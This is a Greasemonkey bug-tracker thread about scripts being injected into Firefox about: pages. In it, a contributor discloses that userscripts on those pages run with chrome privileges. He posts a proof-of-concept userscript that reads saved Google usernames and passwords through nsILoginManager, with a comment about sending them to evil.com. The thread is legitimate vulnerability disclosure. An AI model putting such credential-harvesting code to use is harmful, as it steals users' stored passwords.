Script injection attempted in about:addons

[Martii]

Original title: Script injection attempted in about:addons

In Firefox 4.x, Greasemonkey attempts to inject a script when @include rule is set to about:addons and user navigates to about:addons which also throws this warning

Warning: assignment to undeclared variable _createItemOrig
Source File: chrome://greasemonkey/content/addons4-overlay.js
Line: 16

Sample script

// ==UserScript==
// @name          about:addons test
// @namespace     http://localhost
// @description   Tests GMs injection on about:addons
// @include  about:addons
// @include http://www.iana.org/domains/example/
// ==/UserScript==

  alert('foo');

The monkey menu also reflects this attempt as being successfully injected however no alert happens. It is handy to have the popup menu available however it shouldn't reflect nor try to inject a script at this URI.

Mozilla/5.0 (X11; Linux x86_64; rv:2.0) Gecko/20100101 Firefox/4.0

[arantius]

Closing invalid, I can't come close to reproducing any of this.

[Martii]

monkey menu has been completely refactored and broken, as acknowledged in #1306, by this commit forward thus invalidated this report. Still present in GM 0.9.1 release.

Closing as invalidated-by would be a more proper tag along with commit reference.

[LouCypher]

I found that user script run on these about pages has chrome previleges

• about:
• about:addons
• about:config
• about:crashes
• about:memory
• about:permissions
• about:plugins
• about:support

I tried the snippet on https://developer.mozilla.org/en/Using_nsILoginManager#Retrieving_a_password worked with user script run on the above pages.

// ==UserScript==
// @name            Retrieving passwords via about: pages
// @namespace       http://mozilla.status.net/loucypher
// @include         about:*
// ==/UserScript==

var hostname = 'https://www.google.com';
var formSubmitURL = 'https://www.google.com';  // not http://www.example.com/foo/auth.cgi
var httprealm = null;
var username, password;

try {
  var myLoginManager = Components.classes["@mozilla.org/login-manager;1"].
                        getService(Components.interfaces.nsILoginManager);
  var logins = myLoginManager.findLogins({}, hostname, formSubmitURL, httprealm);
  var info = "";
  for (var i = 0; i < logins.length; i++) {
    info += logins[i].username + "\n";
    info += logins[i].password + "\n\n";
  }
  //GM_log(info);
  alert(info); // show usernames and passwords for google.com
               // or send to evil.com via XHR (untested)
} catch(ex) {
  // This will only happen if there is no nsILoginManager component class
  //GM_log(ex);
}

[arantius]

Lou: Please open a (separate) bug for this.

I found that user script run on these about pages has chrome previleges

But scripts don't run there unless you toggle greasemonkey.aboutIsGreaseable on, right?

[LouCypher]

Lou: Please open a (separate) bug for this.

I thought it was relevant but.. Ok then

But scripts don't run there unless you toggle greasemonkey.aboutIsGreaseable on, right?

Yes, but it shouldn't have chrome previleges.

[arantius]

I thought it was relevant but.. Ok then

Whether it is or not, this issue is closed. The point of issues is to be open, fixed, then closed, to track what still needs doing and what is already done. It's really hard to organize work on issues that are already closed.